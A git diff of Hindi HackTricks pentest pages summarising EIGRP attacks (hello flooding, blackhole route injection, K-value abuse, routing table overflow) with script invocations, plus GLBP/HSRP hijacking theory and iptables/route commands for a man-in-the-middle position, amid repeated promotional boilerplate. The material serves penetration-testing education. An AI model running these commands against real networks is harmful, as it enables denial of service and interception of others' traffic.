* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,52 +1,53 @@
|
|||
# EIGRP हमले
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**यह उन हमलों का सारांश है जो** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए हैं।** अधिक जानकारी के लिए इसे देखें।
|
||||
**यह** [**https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9**](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) **में उजागर किए गए हमलों का सारांश है। अधिक जानकारी के लिए इसे देखें।**
|
||||
|
||||
## **फेक EIGRP पड़ोसियों हमला**
|
||||
|
||||
- **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जो संभावित रूप से एक सेवा की असुरक्षितता (DoS) हमले तक जा सकता है।
|
||||
- **उद्देश्य**: EIGRP हैलो पैकेट्स से राउटर CPU को ओवरलोड करना, जिससे एक डिनायल ऑफ सर्विस (DoS) हमला हो सकता है।
|
||||
- **उपकरण**: **helloflooding.py** स्क्रिप्ट।
|
||||
- **अमल**:
|
||||
%%%bash
|
||||
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
|
||||
%%%
|
||||
- **पैरामीटर**:
|
||||
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे `eth0`।
|
||||
- `--as`: EIGRP स्वतंत्र प्रणाली संख्या को परिभाषित करता है, जैसे `1`।
|
||||
- `--subnet`: उपनेट स्थान को सेट करता है, जैसे `10.10.100.0/24`।
|
||||
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है, जैसे, `eth0`।
|
||||
- `--as`: EIGRP स्वतंत्र सिस्टम नंबर को परिभाषित करता है, जैसे, `1`।
|
||||
- `--subnet`: सबनेट स्थान को सेट करता है, जैसे, `10.10.100.0/24`।
|
||||
|
||||
## **EIGRP ब्लैकहोल हमला**
|
||||
|
||||
- **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को विघटित करना, जिससे एक काले गड्ढे की ओर ले जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है।
|
||||
- **उद्देश्य**: एक गलत रूट डालकर नेटवर्क ट्रैफिक फ्लो को व्यवस्थित करना, जिससे एक ब्लैकहोल बनाया जाता है जहां ट्रैफिक एक अस्तित्वहीन गंतव्य की ओर निर्देशित होता है।
|
||||
- **उपकरण**: **routeinject.py** स्क्रिप्ट।
|
||||
- **अमल**:
|
||||
%%%bash
|
||||
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
||||
%%%
|
||||
- **पैरामीटर**:
|
||||
- `--interface`: हमले करने वाले सिस्टम इंटरफेस को निर्दिष्ट करता है।
|
||||
- `--as`: EIGRP AS संख्या को परिभाषित करता है।
|
||||
- `--src`: हमले करने वाले का IP पता सेट करता है।
|
||||
- `--interface`: हमलावर सिस्टम इंटरफेस को निर्दिष्ट करता है।
|
||||
- `--as`: EIGRP AS नंबर को परिभाषित करता है।
|
||||
- `--src`: हमलावर का IP पता सेट करता है।
|
||||
- `--dst`: लक्ष्य सबनेट IP को सेट करता है।
|
||||
- `--prefix`: लक्ष्य सबनेट IP का मास्क परिभाषित करता है।
|
||||
|
||||
## **K-मानों का दुरुपयोग हमला**
|
||||
|
||||
- **उद्देश्य**: संशोधित K-मानों को डालकर EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजन बनाना, जिससे एक सेवा की असुरक्षितता हमला हो।
|
||||
- **उद्देश्य**: संशोधित K-मानों को इंजेक्ट करके EIGRP डोमेन में निरंतर विघटन और पुनर्संयोजनाएं बनाना, जिससे एक DoS हमला हो।
|
||||
- **उपकरण**: **relationshipnightmare.py** स्क्रिप्ट।
|
||||
- **अमल**:
|
||||
%%%bash
|
||||
|
@ -54,12 +55,12 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
%%%
|
||||
- **पैरामीटर**:
|
||||
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
|
||||
- `--as`: EIGRP AS संख्या को परिभाषित करता है।
|
||||
- `--as`: EIGRP AS नंबर को परिभाषित करता है।
|
||||
- `--src`: वैध राउटर का IP पता सेट करता है।
|
||||
|
||||
## **रूटिंग तालिका ओवरफ्लो हमला**
|
||||
|
||||
- **उद्देश्य**: राउटर की CPU और RAM को ताकत देने के लिए नकली रूटों से रूटिंग तालिका को भरना।
|
||||
- **उद्देश्य**: नकली रूटों के साथ रूटर का CPU और RAM को तनाव देना।
|
||||
- **उपकरण**: **routingtableoverflow.py** स्क्रिप्ट।
|
||||
- **अमल**:
|
||||
%%%bash
|
||||
|
@ -67,5 +68,21 @@ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
|
|||
%%%
|
||||
- **पैरामीटर**:
|
||||
- `--interface`: नेटवर्क इंटरफेस को निर्दिष्ट करता है।
|
||||
- `--as`: EIGRP AS संख्या को परिभाषित करता है।
|
||||
- `--src`: हमले करने वाले का IP पता सेट करता है।
|
||||
- `--as`: EIGRP AS नंबर को परिभाषित करता है।
|
||||
- `--src`: हमलावर का IP पता सेट करता है।
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,64 +1,64 @@
|
|||
# GLBP और HSRP हमले
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपने हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## FHRP हाइजैकिंग अवलोकन
|
||||
|
||||
### FHRP में अंदरूनी दृष्टि
|
||||
FHRP को नेटवर्क की मजबूती प्रदान करने के लिए डिज़ाइन किया गया है जिसमें कई राउटर्स को एक एकल आभासी इकाई में मिलाया जाता है, जिससे लोड वितरण और विफलता सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं।
|
||||
FHRP का उद्देश्य नेटवर्क को मजबूती प्रदान करना है जिसे कई राउटरों को एक एकल आभासी इकाई में मिलाकर सुधारा जाता है, जिससे लोड वितरण और दोष सहनशीलता में सुधार होता है। सिस्को सिस्टम्स ने इस सुइट में प्रमुख प्रोटोकॉल जैसे GLBP और HSRP पेश किए हैं।
|
||||
|
||||
### GLBP प्रोटोकॉल की अंदरूनी दृष्टि
|
||||
सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है जो पोर्ट 3222 पर होता है। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड के अंतराल पर आपस में विनिमय करते हैं। यदि किसी राउटर ने 10 सेकंड के लिए इन पैकेट्स को नहीं भेजा, तो उसे ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं।
|
||||
सिस्को का निर्माण, GLBP, TCP/IP स्टैक पर काम करता है, संचार के लिए UDP का उपयोग करता है पोर्ट 3222 पर। GLBP समूह में राउटर "हैलो" पैकेट्स को 3-सेकंड की अंतराल पर आदान-प्रदान करते हैं। यदि किसी राउटर ने इन पैकेट्स को 10 सेकंड के लिए नहीं भेजा, तो इसे ऑफलाइन माना जाता है। हालांकि, ये टाइमर निर्धारित नहीं हैं और संशोधित किए जा सकते हैं।
|
||||
|
||||
### GLBP कार्य और लोड वितरण
|
||||
GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटर्स के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों के माध्यम से वास्तविक लोड बैलेंसिंग प्रदान करता है:
|
||||
GLBP एकल आभासी आईपी के साथ कई आभासी मैक पते का उपयोग करके राउटरों के बीच लोड वितरण को संभालता है। GLBP समूह में हर राउटर पैकेट फॉरवर्डिंग में शामिल है। HSRP/VRRP की तुलना में, GLBP कई तरीकों से वास्तविक लोड बैलेंसिंग प्रदान करता है:
|
||||
|
||||
- **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ़ मैक पता का निर्धारण रखता है, जो स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है।
|
||||
- **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ़ मैक पता का निर्धारण बारी-बारी से करता है।
|
||||
- **होस्ट-डिपेंडेंट लोड बैलेंसिंग:** एक होस्ट को स्थिर एवीएफ मैक पता का निर्धारण रखता है, स्थिर एनएटी कॉन्फ़िगरेशन के लिए आवश्यक है।
|
||||
- **राउंड-रॉबिन लोड बैलेंसिंग:** डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच एवीएफ मैक पता का निर्धारण बदलता है।
|
||||
- **वेटेड राउंड-रॉबिन लोड बैलेंसिंग:** पूर्वनिर्धारित "वेट" मैट्रिक्स के आधार पर लोड वितरण करता है।
|
||||
|
||||
### GLBP में मुख्य घटक और शब्दावली
|
||||
- **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, पीयर राउटर्स को मैक पते आवंटित करने के लिए जिम्मेदार।
|
||||
- **AVG (सक्रिय आभासी गेटवे):** मुख्य राउटर, सहपी राउटरों को मैक पते आवंटित करने के लिए जिम्मेदार।
|
||||
- **AVF (सक्रिय आभासी फ़ोरवर्डर):** नेटवर्क ट्रैफ़िक प्रबंधित करने के लिए निर्धारित एक राउटर।
|
||||
- **GLBP प्राथमिकता:** AVG को निर्धारित करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 तक होता है।
|
||||
- **GLBP प्राथमिकता:** AVG का निर्धारण करने वाला मैट्रिक्स, जो डिफ़ॉल्ट रूप से 100 से शुरू होता है और 1 से 255 के बीच होता है।
|
||||
- **GLBP वेट:** एक राउटर पर वर्तमान लोड को प्रतिबिंबित करता है, जिसे मैन्युअल रूप से या ऑब्जेक्ट ट्रैकिंग के माध्यम से समायोजित किया जा सकता है।
|
||||
- **GLBP आभासी आईपी पता:** सभी कनेक्टेड उपकरणों के लिए नेटवर्क का डिफ़ॉल्ट गेटवे के रूप में काम करता है।
|
||||
|
||||
संवाद के लिए, GLBP ने आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग किया है। राउटर 3-सेकंड के अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10-सेकंड की अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं।
|
||||
संवाद के लिए, GLBP आरक्षित मल्टीकास्ट पता 224.0.0.102 और UDP पोर्ट 3222 का उपयोग करता है। राउटर 3-सेकंड की अंतराल पर "हैलो" पैकेट्स भेजते हैं, और यदि 10 सेकंड के अवधि में कोई पैकेट छूट जाता है, तो वे गैर-परिचालनीय माने जाते हैं।
|
||||
|
||||
### GLBP हमले की विधि
|
||||
एक हमलावता GLBP पैकेट भेजकर एक हमलावता राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। इससे DoS या MITM हमले हो सकते हैं, जिससे ट्रैफ़िक अंतरग्रहण या पुनर्निर्देशन हो सकता है।
|
||||
एक हमलावर GLBP पैकेट भेजकर सर्वोत्तम प्राथमिक राउटर बन सकता है जिसमें सर्वोच्च प्राथमिकता मान (255) होता है। यह DoS या MITM हमलों का कारण बन सकता है, जिससे ट्रैफिक अंधाधुंध या पुनर्निर्देशित हो सकता है।
|
||||
|
||||
### Loki के साथ एक GLBP हमला करना
|
||||
[Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वायरशार्क का उपयोग करके वर्चुअल आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी इकट्ठा करने की आवश्यकता होती है।
|
||||
### Loki के साथ GLBP हमले का कार्यान्वयन
|
||||
[Loki](https://github.com/raizo62/loki_on_kali) एक GLBP हमला कर सकता है जिसमें प्राथमिकता और वेट सेट किए गए 255 होते हैं। पूर्व-हमले कदम उपकरणों का उपयोग करके वर्चस्व आईपी पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मूल्यों जैसी जानकारी जुटाने की जरूरत होती है।
|
||||
|
||||
हमले कदम:
|
||||
1. प्रोमिस्क्यूअस मोड पर स्विच करें और आईपी फॉरवर्डिंग सक्षम करें।
|
||||
2. लक्षित राउटर की पहचान करें और उसका आईपी प्राप्त करें।
|
||||
3. एक ग्रेट्यूटस ARP उत्पन्न करें।
|
||||
4. AVG का अनुकरण करते हुए एक दुर्भाग्यपूर्ण GLBP पैकेट डालें।
|
||||
5. हमलावता नेटवर्क इंटरफेस को एक सेकेंडरी आईपी पता सौंपें, GLBP वर्चुअल आईपी का अभिकरण करते हुए।
|
||||
6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी को लागू करें।
|
||||
7. मूल AVG राउटर के माध्यम से निरंतर इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें।
|
||||
5. हमलावर के नेटवर्क इंटरफेस में एक सेकेंडरी आईपी पता निर्धारित करें, GLBP आभासी आईपी का अनुकरण करते हुए।
|
||||
6. पूर्ण ट्रैफ़िक दृश्यता के लिए एसएनएटी का लागू करें।
|
||||
7. मूल AVG राउटर के माध्यम से मौजूदा इंटरनेट एक्सेस सुनिश्चित करने के लिए रूटिंग समायोजित करें।
|
||||
|
||||
इन कदमों का पालन करके, हमलावता खुद को "मध्य में व्यक्ति" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित, को अंतरग्रहण और विश्लेषण करने में सक्षम होता है।
|
||||
इन कदमों का पालन करके, हमलावर खुद को "मैन इन द मिडिल" के रूप में स्थापित करता है, जो नेटवर्क ट्रैफ़िक, अक्रिप्ट या संवेदनशील डेटा सहित नेटवर्क ट्रैफ़िक को अंतर्दृष्टि और विश्लेषण करने में सक्षम होता है।
|
||||
|
||||
प्रदर्शन के लिए, यहाँ आवश्यक कमांड स्निपेट्स हैं:
|
||||
```bash
|
||||
|
@ -74,20 +74,20 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
|||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
### HSRP हाइजैकिंग का पैशिव विवरण कमांड विवरण के साथ
|
||||
### HSRP हाइजैकिंग का पैसिव विवरण एचएसआरपी के साथ कमांड विवरण
|
||||
|
||||
#### HSRP का अवलोकन (हॉट स्टैंडबाई राउटर/पुनरावृत्ति प्रोटोकॉल)
|
||||
HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावृत्ति के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रमुख राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है।
|
||||
#### HSRP का अवलोकन (हॉट स्टैंडबाय राउटर/पुनरावर्तन प्रोटोकॉल)
|
||||
HSRP एक सिस्को प्रोप्राइटरी प्रोटोकॉल है जो नेटवर्क गेटवे पुनरावर्तन के लिए डिज़ाइन किया गया है। इसकी मदद से कई भौतिक राउटर्स को एक एकल तार्किक इकाई में कॉन्फ़िगर किया जा सकता है जिसमें एक साझा आईपी पता होता है। यह तार्किक इकाई प्रधान राउटर द्वारा प्रबंधित की जाती है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP की तरह, जो लोड बैलेंसिंग के लिए प्राथमिकता और वज़न जैसी मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक ही सक्रिय राउटर पर निर्भर है।
|
||||
|
||||
#### HSRP में भूमिकाएँ और शब्दावली
|
||||
- **HSRP सक्रिय राउटर**: गेटवे के रूप में कार्य करने वाली डिवाइस, ट्रैफ़िक फ्लो का प्रबंधन करना।
|
||||
- **HSRP स्टैंडबाई राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है।
|
||||
- **HSRP समूह**: एक एकल सहायक वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटरों का एक सेट।
|
||||
- **HSRP MAC पता**: HSRP सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता।
|
||||
- **HSRP स्टैंडबाय राउटर**: एक बैकअप राउटर, जो सक्रिय राउटर की विफलता के मामले में कार्रवाई करने के लिए तैयार है।
|
||||
- **HSRP समूह**: एक एकल प्रतिरोधी वर्चुअल राउटर बनाने के लिए सहयोग करने वाले राउटर्स का सेट।
|
||||
- **HSRP MAC पता**: एचएसआरपी सेटअप में तार्किक राउटर को निर्धारित किया गया वर्चुअल MAC पता।
|
||||
- **HSRP वर्चुअल आईपी पता**: HSRP समूह का वर्चुअल आईपी पता, जो कनेक्टेड डिवाइस के लिए डिफ़ॉल्ट गेटवे के रूप में कार्य करता है।
|
||||
|
||||
#### HSRP संस्करण
|
||||
HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जिनमें समूह क्षमता, मल्टीकास्ट आईपी उपयोग, और वर्चुअल MAC पता संरचना में मुख्य रूप से अंतर है। प्रोटोकॉल विशेष मल्टीकास्ट आईपी पते का उपयोग सेवा सूचना विनिमय के लिए करता है, हैलो पैकेट्स हर 3 सेकंड में भेजे जाते हैं। एक राउटर को अव्याक्त माना जाता है अगर 10 सेकंड के अंतराल में कोई पैकेट प्राप्त नहीं होता है।
|
||||
|
||||
#### HSRP हमले की तंत्रिका
|
||||
HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती से अधिक प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदमों में HSRP सेटअप के बारे में डेटा जुटाना शामिल है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है।
|
||||
#### HSRP हमले की विधि
|
||||
HSRP हमले में सक्रिय राउटर की भूमिका को ज़बरदस्ती अधिकतम प्राथमिकता मान कर लेना शामिल है। यह एक मैन-इन-द-मिडिल (MITM) हमले की ओर ले जा सकता है। महत्वपूर्ण पूर्व-हमले कदम एचएसआरपी सेटअप के बारे में डेटा जुटाना है, जो ट्रैफ़िक विश्लेषण के लिए वायरशार्क का उपयोग करके किया जा सकता है।
|
||||
|
|
|
@ -1,71 +1,73 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
